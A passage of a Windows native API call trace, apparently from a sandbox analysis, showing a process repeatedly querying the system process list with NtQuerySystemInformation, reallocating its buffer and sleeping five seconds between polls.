ResultLength=0x0) returned 0xc0000004 [0265.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.993] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.033] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.042] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.050] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.064] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.070] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.079] NtAllocateVirtualMemory (in: 